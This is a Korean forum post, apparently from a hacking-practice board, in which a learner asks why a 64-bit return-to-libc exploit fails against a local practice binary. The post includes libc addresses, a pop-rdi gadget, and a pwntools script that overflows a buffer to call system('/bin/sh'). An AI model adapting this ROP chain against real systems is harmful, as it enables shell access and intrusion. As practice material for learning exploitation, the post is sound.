22018,

1/1101

qw3709

64bit RTL 질문..

http://www.hackerschool.org/HS_Boards/zboard.php?AllArticle=true&no=36248 [복사]

연습중인데 잘안되네여.. 도와주세여

system : 0x7ffff7a60510
/bin/sh : 0x7ffff7b9b3f3
pop_rdi_ret : 0x555555554793

payload는

sfp(dummy 8byte)+ret(pop_rdi_ret 8byte)+/bin/sh+system
입니다.

from pwn import *

p = process('./bof64')

base = 0x7ffff7a1e000
system = base+0x42510
binsh = base+0x17d3f3
poprdi = base-0x2aaaa24c986d

print "system : "+hex(system)
print "/bin/sh : "+hex(binsh)
print "pop_rdi_ret : "+hex(poprdi)

exploit = "A"*264
exploit += p64(poprdi)
exploit += p64(binsh)
exploit += p64(system)

p.send(exploit)
p.interactive

파이썬 코드입니다...
잘모르겠습니다 도와주세요

Hit : 9651 Date : 2018/06/19 03:54